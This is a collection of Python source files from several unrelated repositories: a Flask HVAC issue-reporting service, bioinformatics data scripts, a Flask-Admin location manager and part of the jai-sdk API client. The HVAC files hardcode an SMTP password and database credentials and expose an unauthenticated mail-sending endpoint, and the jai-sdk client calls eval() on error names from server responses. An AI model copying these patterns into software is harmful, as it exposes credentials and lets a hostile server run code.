% (self._id, self._buildingLocation, self._floorLocation, self._roomLocation, self._description)
class Building(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'Building'
_id = Column('Id', Integer, primary_key = True)
_buildingName = Column('BuildingName', String(255))
#Relationships
_floors = relationship('Floor', back_populates = '_building') #Floors and Building
#Constructor
def __init__(self, identifier, buildingName):
self._id = identifier
self._buildingName = buildingName
#Properties
@property
def id(self):
return self._id
@id.setter
def id(self, value):
self._id = value
@property
def buildingName(self):
return self._buildingName
@buildingName.setter
def buildingName(self, value):
self._buildingName = value
@property
def floors(self):
return self._floors
@floors.setter
def floors(self, value):
self._floors = value
#Methods
def __str__(self):
return "<Building(id = '%s', buildingName = '%s')>" \
% (self._id, self._buildingName)
def serialize(self):
return{
'buildingId':self._id,
'buildingName':self._buildingName
}
class Floor(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'Floor'
_buildingId = Column('BuildingId', Integer, ForeignKey("Building.Id"), primary_key = True)
_floorNumber = Column('FloorNumber', Integer, primary_key = True)
_floorName = Column('FloorName', String(255))
#Relationships
_building = relationship('Building', back_populates = '_floors') #Floors and Building
_rooms = relationship('Room', back_populates = '_floor') #Floor and Rooms
#Constructor
def __init__(self, buildingId, floorNumber, floorName):
self._buildingId = buildingId
self._floorNumber = floorNumber
self._floorName = floorName
#Properties
@property
def buildingId(self):
return self._buildingId
@buildingId.setter
def buildingId(self, value):
self._buildingId = value
@property
def floorNumber(self):
return self._floorNumber
@floorNumber.setter
def floorNumber(self, value):
self._floorNumber = value
@property
def floorName(self):
return self._floorName
@floorName.setter
def floorName(self, value):
self._floorName = value
#Methods
def __str__(self):
return "<Floor(buildingId = '%s', floorNumber = '%s', floorName = '%s')>" \
% (self._buildingId, self._floorNumber, self._floorName)
def serialize(self):
return{
'buildingId':self._buildingId,
'floorNumber':self._floorNumber,
'floorName':self._floorName,
}
class Room(Base):
"""Class to map to the HVACIssue table in the HVAC DB"""
__tablename__ = 'Room'
_buildingId = Column('BuildingId', Integer, primary_key = True)
_floorNumber = Column('FloorNumber', Integer, primary_key = True)
_roomId = Column('RoomId', Integer, primary_key = True)
_roomName = Column('RoomName', String(255))
#Foreign key
__table_args__ = (ForeignKeyConstraint(['BuildingId', 'FloorNumber'], ['Floor.BuildingId', 'Floor.FloorNumber'], onupdate="CASCADE", ondelete="CASCADE"), {})
#Relationships
_floor = relationship('Floor', back_populates = '_rooms') #Rooms and Floor
#Constructor
def __init__(self, buildingId, floorNumber, roomId, roomName):
self._buildingId = buildingId
self._floorNumber = floorNumber
self._roomId = roomId
self._roomName = roomName
#Properties
@property
def buildingId(self):
return self._buildingId
@buildingId.setter
def buildingId(self, value):
self._buildingId = value
@property
def floorNumber(self):
return self._floorNumber
@floorNumber.setter
def floorNumber(self, value):
self._floorNumber = value
@property
def roomId(self):
return self._roomId
@roomId.setter
def roomId(self, value):
self._roomId = value
@property
def roomName(self):
        return self._roomName
@roomName.setter
def roomName(self, value):
        self._roomName = value
#Methods
def __str__(self):
return "<Room(buildingId = '%s', floorNumber = '%s', roomId = '%s', roomName = '%s')>" \
% (self._buildingId, self._floorNumber, self._roomId, self._roomName)
def serialize(self):
return{
'buildingId':self._buildingId,
'floorNumber':self._floorNumber,
'roomId':self._roomId,
'roomName':self._roomName
}
```
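A short, hypothetical sketch of how these mappings could be exercised against an in-memory SQLite database, assuming the `iHvac` package is importable; the engine URL and the sample building/floor/room values are assumptions for illustration only, not part of the project:
```python
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from iHvac.hvacIssueDBMapping import Base, Building, Floor, Room, HVACIssue

engine = create_engine("sqlite:///:memory:")
Base.metadata.create_all(engine)  # creates the Building, Floor, Room and HVACIssue tables
session = sessionmaker(bind=engine)()
session.add(Building(1, "Engineering Hall"))               # illustrative values
session.add(Floor(1, 2, "Second Floor"))
session.add(Room(1, 2, 210, "Room 210"))
session.add(HVACIssue("Engineering Hall", 2, "Room 210", "AC not cooling"))
session.commit()
print([str(f) for f in session.query(Building).one().floors])
```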
#### File: webServiceTest/iHvac/hvacServices.py
```python
from flask import request, current_app, Blueprint, render_template
from sqlalchemy import and_
from flask_sqlalchemy import SQLAlchemy
from iHvac.db import *
from iHvac.hvacIssueDBMapping import *
from . import global_s
from flask import jsonify
from smtplib import SMTP
import datetime
bp = Blueprint('services', __name__, url_prefix='/services')
# a simple page that says hello
@bp.route('/hello', methods=['POST'])
def hello():
return "hello"
@bp.route('/reportHvacIssue', methods=['POST'])
def reporthvacIssue():
if request.method == 'POST':
data = request.get_json()
locationBuilding = data['buildingId']
locationFloor = data['floorId']
locationRoom = data['roomId']
description = data['issueDescription']
hvacIssue = HVACIssue(locationBuilding, locationFloor, locationRoom, description)
global_s.dbConnection.session.add(hvacIssue)
global_s.dbConnection.session.commit()
return jsonify(True)
@bp.route('/getBuildingRoomsByFloor', methods=['POST'])
def getBuildingRoomsByFloor():
if request.method == 'POST':
data = request.get_json()
floor = global_s.dbConnection.session.query(Floor).filter(and_(Floor._buildingId == data["buildingId"]), Floor._floorNumber == data["buildingFloor"]).one()
rooms = [r.serialize() for r in floor._rooms]
return jsonify(rooms)
@bp.route('/getBuildingFloors', methods=['POST'])
def getBuildingFloors():
if request.method == 'POST':
data = request.get_json()
building = global_s.dbConnection.session.query(Building).filter(Building._id == data["buildingId"]).one()
floors = [f.serialize() for f in building.floors]
return jsonify(floors)
@bp.route('/getBuildings', methods=['POST'])
def getBuildings():
if request.method == 'POST':
buildings = global_s.dbConnection.session.query(Building).all()
bldgs = [b.serialize() for b in buildings]
return jsonify(bldgs)
@bp.route('/errorMail', methods=['GET'])
def errorMail():
if request.method == 'GET':
message_text = request.args.get('message')
subj = request.args.get('subj')
#message_text = "Hello\nThis is a mail from your server\n\nBye\n"
sendMail(message_text, subj)
return "Mail sent"
def sendMail(message_text, subj):
smtp = SMTP("smtp.gmail.com:587")
smtp.ehlo()
smtp.starttls()
smtp.login("<EMAIL>", "controlslab.uc")
from_addr = "Controls Lab <<EMAIL>>"
to_addr = "<EMAIL>"
#subj = "Critical"
date = datetime.datetime.now().strftime("%d/%m/%Y %H:%M")
#message_text = "Hello\nThis is a mail from your server\n\nBye\n"
msg = "From %s\nTo: %s\nSubject: %s\nDate: %s\n\n%s" % (from_addr, to_addr, subj, date, message_text)
smtp.sendmail(from_addr, to_addr, msg)
smtp.quit()
```
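A hedged example of calling the issue-reporting endpoint above from a client; the host, port and payload values are illustrative only (the blueprint is registered under the `/services` prefix in `create_app` below):
```python
import requests

payload = {
    "buildingId": "Engineering Hall",   # illustrative values
    "floorId": 2,
    "roomId": "Room 210",
    "issueDescription": "AC not cooling",
}
resp = requests.post("http://127.0.0.1:5000/services/reportHvacIssue", json=payload)
print(resp.json())  # the view returns jsonify(True) on success
```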
#### File: webServiceTest/iHvac/__init__.py
```python
import os
import logging
from flask import Flask
#from .hvacIssueDBMapping import *
#from . import db
from . import hvacServices
from flask_sqlalchemy import SQLAlchemy
from . import global_s
def create_app(test_config=None):
# create and configure the app
app = Flask(__name__, instance_relative_config=True)
app.config.from_mapping(
SECRET_KEY='dev',
#DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),
SQLALCHEMY_DATABASE_URI="mysql+mysqldb://ihvac:[email protected]:3306/HVACIssues",
)
if test_config is None:
# load the instance config, if it exists, when not testing
app.config.from_pyfile('config.py', silent=True)
else:
# load the test config if passed in
app.config.from_mapping(test_config)
#set the logger config
logging.basicConfig(filename='hvacIssue.log', level=logging.WARNING,\
format='%(levelname)s:%(threadName)s:%(asctime)s:%(filename)s:%(funcName)s:%(message)s', datefmt='%m/%d/%Y %H:%M:%S')
# ensure the instance folder exists
try:
os.makedirs(app.instance_path)
except OSError:
pass
#db.init_app(app)
app.register_blueprint(hvacServices.bp)
global_s.dbConnection = SQLAlchemy(app)
return app
``` |
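For local development, the application factory above can be driven directly; a running MySQL instance is assumed for any request that touches the database, and the host/port arguments below are assumptions:
```python
from iHvac import create_app

app = create_app()
app.run(host="127.0.0.1", port=5000, debug=True)
```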
{
"source": "jqsunac/doi",
"score": 2
} |
#### File: fevo.2021.762173/scripts/generate_meshdataset.py
```python
import os
import sys
import re
import numpy as np
import pandas as pd
level = sys.argv[1]
kankyo_fpath = sys.argv[2]
spname_fpath = sys.argv[3]
class_fpath = sys.argv[4]
output_fpath = sys.argv[5]
def mesh2gps(mesh_code):
mesh_code = str(mesh_code)
lat = int(mesh_code[0:2]) * 2 / 3
lng = int(mesh_code[2:4]) + 100
if len(mesh_code) > 4:
if len(mesh_code) >= 6:
lat += int(mesh_code[4]) * 2 / 3 / 8
lng += int(mesh_code[5]) / 8
return (lat, lng)
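# Worked example (illustrative values): the 4-digit primary mesh code '5339'
# decodes to the south-west corner lat = 53 * 2/3 = 35.333..., lng = 39 + 100 = 139.0;
# a 6-digit code such as '533945' further adds 4 * 2/3 / 8 to the latitude and
# 5 / 8 to the longitude, giving roughly (35.667, 139.625).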
# get class labels (the order should be matched to image-model outputs)
class_labels = []
with open(class_fpath, 'r') as infh:
for buf in infh:
class_labels.append(buf.replace('\n', ''))
# get metadata to convert species ID to species biname
id2class = {}
with open(spname_fpath, 'r') as infh:
infh.readline()
for buf in infh:
bufs = buf.replace('\n', '').split(',')
id2class[bufs[0]] = bufs[4] + '_' + bufs[6]
# read Kankyosho public data
# and manually modify Kankyosho data according to the rearrangement of taxonomic orders
## Rhipidolestes okinawanus: 392722, 392746, 392756, 392757, 392860, 392870
## Rhipidolestes shozoi: 392860, 392870, 402801, 402811, 402812
## Rhipidolestes amamiensis: 412857, 412867, 422922, 222932, 422933, 422944, 473002
## Rhipidolestes asatoi: 472935, 472945
## Anotogaster klossi: 362336, 362337, 362346, 362347, 362441, 362451
## Rhipidolestes yakusimensis: remove 472935, 472945, and add 473002 from the original set
## Anotogaster sieboldii: remove 362336, 362337, 362346, 362347, 362441, 362451 from the original set
fdata_mesh = []
fdata_species = []
with open(kankyo_fpath, 'r') as infh:
for buf in infh:
bufs = buf.replace('\n', '').split(',')
cl = id2class[bufs[0]]
if cl == 'Rhipidolestes_yakusimensis':
if bufs[1] in ['472935', '472945']:
print('removed: ' + cl + ' -- ' + bufs[1])
else:
fdata_mesh.append(bufs[1])
fdata_species.append(id2class[bufs[0]])
elif cl == 'Anotogaster_sieboldii':
if bufs[1] in ['362336', '362337', '362346', '362347', '362441', '362451']:
print('removed: ' + cl + ' -- ' + bufs[1])
else:
fdata_mesh.append(bufs[1])
fdata_species.append(id2class[bufs[0]])
else:
fdata_mesh.append(bufs[1])
fdata_species.append(id2class[bufs[0]])
fdata_species.extend(['Rhipidolestes_okinawanus'] * 6)
fdata_mesh.extend(['392722', '392746', '392756', '392757', '392860', '392870'])
fdata_species.extend(['Rhipidolestes_shozoi'] * 5)
fdata_mesh.extend(['392860', '392870', '402801', '402811', '402812'])
fdata_species.extend(['Rhipidolestes_amamiensis'] * 7)
fdata_mesh.extend(['412857', '412867', '422922', '222932', '422933', '422944', '473002'])
fdata_species.extend(['Rhipidolestes_asatoi'] * 2)
fdata_mesh.extend(['472935', '472945'])
fdata_species.extend(['Anotogaster_klossi'] * 6)
fdata_mesh.extend(['362336', '362337', '362346', '362347', '362441', '362451'])
fdata_species.extend(['Rhipidolestes_yakusimensis'])
fdata_mesh.extend(['473002'])
# change species name (level) to genus name (level)
if level == 'genus':
for i, spname in enumerate(fdata_species):
fdata_species[i] = spname.split('_')[0]
# mesh to lat&lng
latlng = []
for _fdata_mesh in sorted(list(set(fdata_mesh))):
latlng.append(mesh2gps(_fdata_mesh))
latlng = pd.DataFrame(latlng, columns=['lat', 'lng'],
index=sorted(list(set(fdata_mesh))))
# make appearance matrix
print(len(class_labels))
dmat = pd.DataFrame(np.zeros((len(set(fdata_mesh)), len(class_labels))))
dmat.columns = class_labels
dmat.index = sorted(list(set(fdata_mesh)))
# appearance matrix summary
dsum = pd.DataFrame(np.zeros((len(set(fdata_mesh)), len(class_labels))))
dsum.columns = class_labels
dsum.index = sorted(list(set(fdata_mesh)))
for _mesh, _species in zip(fdata_mesh, fdata_species):
if _species in class_labels:
dmat.loc[_mesh, _species] = 1
dsum.loc[_mesh, _species] += 1
dmat = pd.concat([latlng, dmat], axis=1)
dsum = dsum.sum(axis=0)
print(dsum)
# write out the data
dmat.to_csv(output_fpath, header=True, index=True, sep='\t', compression='gzip')
dsum.to_csv(output_fpath.replace('.tsv', '').replace('.gz', '') + '.summary.tsv', header=False, index=True, sep='\t')
```
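The script above is driven purely by positional arguments; a hedged example of invoking it (all file names are placeholders):
```python
import subprocess

# Argument order: level ('species' or 'genus'), the Kankyosho records CSV, the species-name CSV,
# the class-label list and the gzip-compressed output TSV. File names below are hypothetical.
subprocess.run(
    ["python", "generate_meshdataset.py", "genus",
     "kankyosho_records.csv", "species_names.csv", "class_labels.txt", "mesh_dataset.tsv.gz"],
    check=True,
)
```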
#### File: local/scripts/create_gene_chr_list.py
```python
import os
import sys
import re
import argparse
#
# ptyhon $this --gff camara/genome.modified.gff
#
def proc_main(gff_path):
gene2chr = {}
with open(gff_path, 'r') as fh:
for buf in fh:
r = buf.split('\t')
if r[2] == 'gene':
gene2chr[r[8][3:14]] = r[0]
for k, v in gene2chr.items():
print(k + '\t' + v)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'GO data generation.')
parser.add_argument('-g', '--gff', required = True)
args = parser.parse_args()
proc_main(args.gff)
```
#### File: local/scripts/sortvcf.py
```python
import sys
def main():
fp = open(sys.argv[1], "r")
vcfs = []
for line in fp:
if line[0] == "#":
            print(line.rstrip())
continue
cols = line.split("\t")
vcfs.append([cols[0], int(cols[1]), line.rstrip()])
vcfs = sorted(vcfs, key=lambda x:(x[0],x[1]))
for v in vcfs:
        print(v[2])
if __name__ == '__main__':
main()
```
#### File: fimmu.2018.00251/bin/make_cdr3_clusters_tsv.py
```python
import os
import sys
import argparse
import re
from Bio import SeqIO
def create_tsv(f, c, o):
# read FASTA file
    fastafh = open(f, 'r')
seqid2seq = {}
for record in SeqIO.parse(fastafh, "fasta"):
seqid2seq[record.description] = str(record.seq)
fastafh.close()
# read cluster file
mptn = re.compile(r'>(.+)\.\.\.')
clusterid2seqidlist = {}
clusterid2repseqid = {}
clusterid2seqsize_fugu1 = {}
clusterid2seqsize_fugu2 = {}
clusterid2seqsize_fugu3 = {}
cluster_id = None
with open(c, 'r') as clstrfh:
for buf in clstrfh:
if buf[0:1] == '>':
cluster_id = buf[1:]
cluster_id = cluster_id.replace('\n', '')
cluster_id = cluster_id.replace(' ', '_')
# init
clusterid2seqidlist[cluster_id] = []
clusterid2repseqid[cluster_id] = None
clusterid2seqsize_fugu1[cluster_id] = 0
clusterid2seqsize_fugu2[cluster_id] = 0
clusterid2seqsize_fugu3[cluster_id] = 0
else:
m = mptn.search(buf)
seqid = m.group(1)
if 'fugu1' in buf:
clusterid2seqsize_fugu1[cluster_id] += 1
if 'fugu2' in buf:
clusterid2seqsize_fugu2[cluster_id] += 1
if 'fugu3' in buf:
clusterid2seqsize_fugu3[cluster_id] += 1
if '*' in buf:
clusterid2seqidlist[cluster_id].append('*' + seqid)
clusterid2repseqid[cluster_id] = seqid
else:
clusterid2seqidlist[cluster_id].append(seqid)
# print out tsv
with open(o, 'w') as outfh:
        outfh.write('ClusterID\tRepresentSeq\tRepresentSeqLen\tFugu1Count\tFugu2Count\tFugu3Count\tTotalCount\tSeqID\n')
        for cls_id in sorted(clusterid2repseqid.keys()):
arr = [cls_id,
seqid2seq[clusterid2repseqid[cls_id]],
str(len(seqid2seq[clusterid2repseqid[cls_id]])),
str(clusterid2seqsize_fugu1[cls_id]),
str(clusterid2seqsize_fugu2[cls_id]),
str(clusterid2seqsize_fugu3[cls_id]),
str(clusterid2seqsize_fugu1[cls_id] + clusterid2seqsize_fugu2[cls_id] + clusterid2seqsize_fugu3[cls_id]),
';'.join(clusterid2seqidlist[cls_id])]
outfh.write('\t'.join(arr) + '\n')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Create CDR3 capture-recapture dataset.')
parser.add_argument('-f', '--fasta', required = True)
parser.add_argument('-c', '--clstr', required = True)
parser.add_argument('-o', '--output', required = True)
args = parser.parse_args()
create_tsv(args.fasta, args.clstr, args.output)
```
#### File: fimmu.2018.00251/bin/make_cluster_abudance.py
```python
import os
import sys
import argparse
import re
from Bio import SeqIO
def create_tsv(p, c, o):
pfiles = p.split(",")
mptn = re.compile(r'>(fugu[1-3])_(.+)\.\.\.')
class_type = {}
seq_dict = {}
with open(c, 'r') as clstrfh:
cluster_id = None
fugu_id = None
seq_id = None
for buf in clstrfh:
if buf[0:1] == '>':
cluster_id = buf[1:]
cluster_id = cluster_id.replace('\n', '')
cluster_id = cluster_id.replace(' ', '_')
else:
m = mptn.search(buf)
fugu_id = m.group(1)
seq_id = m.group(2)
seq_dict[seq_id] = {'F': fugu_id, 'C': cluster_id}
if cluster_id not in class_type:
class_type[cluster_id] = {'N': 0}
class_type[cluster_id][fugu_id] = 1
class_type[cluster_id]['N'] += 1
outfh = open(o, 'w')
for pfile in pfiles:
with open(pfile, 'r') as pfh:
for buf in pfh:
buf = buf.replace('\n', '')
if buf[0:6] == '#BEGIN':
seq_id = None
vdel = None
jdel = None
vjins = None
cdr3aa = None
if buf[0:2] == 'QN':
seq_id = buf[3:]
if buf[0:2] == 'VD':
vdel = buf[3:]
if vdel == '.':
vdel = ''
if buf[0:2] == 'JD':
jdel = buf[3:]
if jdel == '.':
jdel = ''
if buf[0:2] == 'VJ':
vjins = buf[3:]
if vjins == '.':
vjins = ''
if buf[0:7] == '#CDR3AA':
cdr3aa = buf[8:]
if buf[0:4] == '#END':
if seq_id in seq_dict:
txt = seq_dict[seq_id]['C'] + '\t' + str(len(class_type[seq_dict[seq_id]['C']]) - 1) + '\t'
txt = txt + str(class_type[seq_dict[seq_id]['C']]['N']) + '\t'
txt = txt + seq_dict[seq_id]['F'] + '\t'# + seq_id + '\t'
txt = txt + cdr3aa + '\t' + vdel + '\t' + jdel + '\t' + vjins + '\n'
outfh.write(txt)
outfh.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description = 'Create CDR3 capture-recapture dataset.')
parser.add_argument('-p', '--pydair', required = True)
parser.add_argument('-c', '--clstr', required = True)
parser.add_argument('-o', '--output', required = True)
args = parser.parse_args()
create_tsv(args.pydair, args.clstr, args.output)
``` |
{
"source": "jqsunac/pandabox",
"score": 3
} |
#### File: pandabox/seqUtils/vcf.py
```python
import os
import sys
import re
import gzip
class VCF:
'''
VCF file format, POS with the 1st base having position 1.
'''
def __init__(self):
pass
def parse_vcf(self, file_path, chr_name=None, pos_range=None):
'''
Input: /path/to/vcf
        Output: dictionary keyed by chromosome name; each value is a list
                of dicts holding the POS, REF, ALT, QUAL and INFO fields
                of each record on that chromosome.
'''
snp_dict = {}
infh = None
if os.path.splitext(file_path)[1] in ['.gz', '.gzip']:
infh = gzip.open(file_path, 'rt')
else:
infh = open(file_path, 'r')
for file_buff in infh:
if file_buff[0] == '#':
continue
vcf_record = file_buff.replace('\n', '').split('\t')
# discard if not target chromosome
if chr_name is not None and chr_name != vcf_record[0]:
continue
# discard if not in the target ranges
if pos_range is not None and (int(vcf_record[1]) < pos_range[0] or pos_range[1] < int(vcf_record[1])):
continue
if vcf_record[0] not in snp_dict:
snp_dict[vcf_record[0]] = []
vcf_tags = {}
for attr, val in zip(vcf_record[8].split(':'), vcf_record[9].split(':')):
vcf_tags[attr] = val
snp_dict[vcf_record[0]].append({
'POS': int(vcf_record[1]),
'REF': vcf_record[3],
'ALT': vcf_record[4],
'QUAL': float(vcf_record[5]),
'INFO': vcf_tags
})
infh.close()
if len(snp_dict) > 0:
for chr_name in snp_dict.keys():
snp_dict[chr_name].sort(key=lambda x: x['POS'])
return snp_dict
if __name__ == '__main__':
vcf = VCF()
vcf_fpath = '../../datasets/sample.vcf'
snp_dict = vcf.parse_vcf(vcf_fpath, chr_name='1', pos_range=[500, 1000])
print(snp_dict)
``` |
{
"source": "jquan2/time-of-need-backend",
"score": 2
} |
#### File: time-of-need-backend/ton/application.py
```python
from flask import Flask, abort, flash, redirect, render_template, request, url_for # noqa
from flask.ext import restful
from flask_admin import Admin
from flask_admin import helpers as admin_helpers
from flask_admin.contrib import sqla
from flask_security import SQLAlchemyUserDatastore, Security, current_user
from flask_security.utils import encrypt_password
from wtforms.fields import PasswordField
from .models import Location, Role, User, db
app = Flask(__name__)
app.config.from_pyfile('config.py')
db.init_app(app)
app.db = db
# Setup api
app.api = restful.Api(app)
from .api import api_initialize # noqa
api_initialize()
@app.route('/')
def index():
return render_template('index.html')
# Setup Flask-Security
user_datastore = SQLAlchemyUserDatastore(app.db, User, Role)
security = Security(app, user_datastore)
class PasswordNotGivenError(ValueError):
pass
class PasswordCompareError(ValueError):
pass
class BorkCurrentUserError(ValueError):
pass
# Create customized model view classes
class SecureView(sqla.ModelView):
def is_accessible(self):
"""Deny access if current_user isn't a logged-in admin"""
return (current_user.is_active and
current_user.is_authenticated and
current_user.has_role('Administrator'))
def _handle_view(self, name, **kwargs):
"""Redirect users when a view is not accessible"""
if not self.is_accessible():
if current_user.is_authenticated:
# permission denied
abort(403)
else:
# login
return redirect(url_for('security.login', next=request.url))
class StandardFilteredView(sqla.ModelView):
def is_accessible(self):
"""Deny access if current_user isn't a logged-in admin"""
return (current_user.is_active and
current_user.is_authenticated and (
current_user.has_role('Administrator') or
current_user.has_role('Standard')))
def _handle_view(self, name, **kwargs):
"""Redirect users when a view is not accessible"""
if not self.is_accessible():
if current_user.is_authenticated:
# permission denied
abort(403)
else:
# login
return redirect(url_for('security.login', next=request.url))
self.can_create = self.can_delete = current_user.has_role('Administrator') # noqa
# Given a location id, are we allowed to edit it?
def is_owned(self, id):
if current_user.has_role('Administrator'):
return True
allowed_locations = [location.id for location in current_user.locations]
return int(id) in allowed_locations
# Overrides to check model ownership
def on_model_change(self, form, model, is_created):
if not self.is_owned(model.id):
abort(403)
def on_form_prefill(self, form, id):
if not self.is_owned(id):
abort(403)
def on_model_delete(self, model):
if not self.is_owned(model.id):
abort(403)
# Query Overrides to limit Standard Users to Locations they Own
def get_query(self):
allowed_locations = [location.id for location in current_user.locations]
if current_user.has_role('Administrator'):
return self.session.query(self.model)
elif current_user.has_role('Standard'):
return self.session.query(self.model).filter(
self.model.id.in_(allowed_locations))
def get_count_query(self):
allowed_locations = [location.id for location in current_user.locations]
if current_user.has_role('Administrator'):
return super(StandardFilteredView, self).get_count_query()
elif current_user.has_role('Standard'):
return super(StandardFilteredView, self).get_count_query().filter(
self.model.id.in_(allowed_locations))
class LocationModelView(StandardFilteredView):
_list_columns = ["name", "services", "city", "state"]
_cols = [
("name", "e.g. Food Bank of Alaska"),
("services", "Click for drop-down choices. May select multiple "
"services. Type to filter."),
("description", ""),
("address_line1", "e.g. 123 Main St."),
("address_line2", "e.g. Ste. 200"),
("address_line3", "e.g. Fairbanks, AK 99775"),
("phone", "e.g. xxx-xxx-xxxx"),
("contact_email", "e.g. <EMAIL>"),
("website", "e.g. wehelppeople.org or www.wehelppeople.org"),
("opening_time", "Useful for locations with regular hours."),
("closing_time", "Useful for locations with regular hours."),
("days_of_week", "Useful for locations with regular hours."),
("city", "Useful for sorting locations. Not sent to mobile devices."),
("state", "Useful for sorting locations. Not sent to mobile devices."),
]
can_view_details = True
column_details_list = [name for name, _ in _cols]
column_default_sort = "name"
column_descriptions = dict(_cols)
column_editable_list = ["city", "state"]
column_list = _list_columns # List view only
form_columns = [name for name, _ in _cols if name not in ["city", "state"]]
class UserModelView(SecureView):
_cols = [
("username", "Account Name"),
("roles", "User Permissions"),
("locations", "Locations Standard user is allowed to edit"),
("email", "Email Address (used for login)"),
("password", "<PASSWORD>"),
("active", "Is login permitted?"),
]
column_default_sort = "username"
column_descriptions = dict(_cols)
# Sub in a non-db-backed field for passwords
column_descriptions["new_password"] = "<PASSWORD> here"
column_descriptions["confirm_password"] = "<PASSWORD>"
column_exclude_list = form_excluded_columns = ['password', ]
def scaffold_form(self):
"""Add new_password field to form"""
form_class = super(UserModelView, self).scaffold_form()
form_class.new_password = PasswordField('<PASSWORD>')
form_class.confirm_password = PasswordField('<PASSWORD>')
return form_class
def on_model_change(self, form, model, is_created):
"""Use new_password field. Block self-deactivation."""
# This problem already nailed a user.
model.username = model.username.strip()
model.email = model.email.strip()
if is_created and not model.new_password:
raise PasswordNotGivenError("You must give new users a password.")
if model == current_user and not model.active:
raise BorkCurrentUserError("You may not deactivate your own account.") # noqa
if model.new_password:
if model.new_password == model.confirm_password:
model.password = <PASSWORD>(<PASSWORD>)
else:
raise PasswordCompareError("Passwords do not match.")
def on_model_delete(self, model):
"""Block self-deletion"""
if model == current_user:
raise BorkCurrentUserError("You may not delete your own account.")
def handle_view_exception(self, exc):
validation_exceptions = [
PasswordNotGivenError,
PasswordCompareError,
BorkCurrentUserError,
]
for e in validation_exceptions:
if isinstance(exc, e):
flash(str(exc), 'error')
return True
return super(UserModelView, self).handle_view_exception(exc)
# Setup Flask-Admin
admin = Admin(app, name='Time of Need Admin', template_mode='bootstrap3',
base_template='my_master.html')
admin.add_view(LocationModelView(Location, db.session, name="Locations"))
admin.add_view(UserModelView(User, db.session, name="Users"))
# Define a context processor for merging flask-admin's template context into
# the flask-security views.
@security.context_processor
def security_context_processor():
return dict(
admin_base_template=admin.base_template,
admin_view=admin.index_view,
h=admin_helpers,
)
``` |
{
"source": "jquant/jai-sdk",
"score": 2
} |
#### File: jquant/jai-sdk/setup.py
```python
import os
import re
from setuptools import find_packages, setup
ROOT_DIR = os.path.dirname(__file__)
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
with open("requirements.txt", "r") as f:
dependencies = f.read().splitlines()
def find_version(*filepath):
# Extract version information from filepath
with open(os.path.join(ROOT_DIR, *filepath)) as fp:
version_match = re.search(r"^__version__ = ['\"]([^'\"]*)['\"]",
fp.read(), re.M)
if version_match:
return version_match.group(1)
raise RuntimeError("Unable to find version string.")
setup(
name="jai-sdk",
version=find_version("jai", "__init__.py"),
author="JQuant",
author_email="<EMAIL>",
description="JAI - Trust your data",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jquant/jai-sdk",
packages=find_packages(exclude=['tests', 'jai.tests']),
include_package_data=True,
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
python_requires=">=3.7",
install_requires=dependencies,
)
``` |
{
"source": "jquant/mycelia-sdk",
"score": 3
} |
#### File: mycelia-sdk/jai/base.py
```python
import os
import json
import requests
import functools
from copy import copy
from .functions.classes import Mode
from .functions import exceptions
__all__ = ["BaseJai"]
def raise_status_error(code):
"""
Decorator to process responses with unexpected response codes.
Args
----
code: int
Expected Code.
"""
def decorator(function):
@functools.wraps(function)
def new_function(*args, **kwargs):
response = function(*args, **kwargs)
if response.status_code == code:
return response.json()
# find a way to process this
# what errors to raise, etc.
message = f"Something went wrong.\n\nSTATUS: {response.status_code}\n"
try:
res_json = response.json()
print(res_json)
if isinstance(res_json, dict):
detail = res_json.get(
'message', res_json.get('detail', response.text))
else:
detail = response.text
except:
detail = response.text
detail = str(detail)
if "Error: " in detail:
error, msg = detail.split(": ", 1)
try:
raise eval(error)(message + msg)
except NameError:
raise eval("exceptions." + error)(message + msg)
except:
raise ValueError(message + response.text)
else:
raise ValueError(message + detail)
return new_function
return decorator
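# Usage sketch (for illustration only): the decorator wraps a method that returns a
# `requests.Response` and yields `response.json()` when the status code matches the
# expected one, e.g.
#
#     @raise_status_error(200)
#     def _info(self, ...):
#         return requests.get(self.url + "/info", headers=self.header)
#
# Any other status code is turned into a raised exception built from the response body.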
class BaseJai(object):
"""
Base class for requests with the Mycelia API.
"""
def __init__(self,
auth_key: str = None,
url: str = None,
var_env: str = "JAI_SECRET"):
"""
Inicialize the Jai class.
An authorization key is needed to use the Mycelia API.
Parameters
----------
auth_key : str
Authorization key for the use of the API.
url : str, optional
Param used for development purposes. `Default is None`.
Returns
-------
None
"""
if auth_key is None:
auth_key = os.environ.get(var_env, "")
if url is None:
self.__url = "https://mycelia.azure-api.net"
self.header = {"Auth": auth_key}
else:
self.__url = url[:-1] if url.endswith("/") else url
self.header = {"company-key": auth_key}
@property
def url(self):
"""
        Base URL of the JAI API used by every request.
"""
return self.__url
@raise_status_error(200)
def _info(self, mode="complete", get_size=True):
"""
Get name and type of each database in your environment.
"""
get_size = json.dumps(get_size)
return requests.get(url=self.url +
f"/info?mode={mode}&get_size={get_size}",
headers=self.header)
@raise_status_error(200)
def _status(self):
"""
Get the status of your JAI environment when training.
"""
return requests.get(self.url + "/status", headers=self.header)
@raise_status_error(200)
def _delete_status(self, name):
return requests.delete(self.url + f"/status?db_name={name}",
headers=self.header)
@raise_status_error(200)
def _download_vectors(self, name: str):
"""
Download vectors from a particular database.
Args
----
name : str
String with the name of a database in your JAI environment.
"""
return requests.get(self.url + f"/key/{name}", headers=self.header)
@raise_status_error(200)
def _filters(self, name):
"""
Gets the valid values of filters.
Args
----
name : str
String with the name of a database in your JAI environment.
"""
return requests.get(self.url + f"/filters/{name}", headers=self.header)
@raise_status_error(200)
def _similar_id(self,
name: str,
id_item: list,
top_k: int = 5,
filters=None):
"""
        Creates a list of dicts with the index and distance of the k most similar items, given an id.
This is a protected method.
Args
----
name : str
String with the name of a database in your JAI environment.
id_item : list
List of ids of the item the user is looking for.
top_k : int
Number of k similar items we want to return. `Default is 5`.
Return
------
response : dict
Dictionary with the index and distance of `the k most similar items`.
"""
if not isinstance(id_item, list):
raise TypeError(
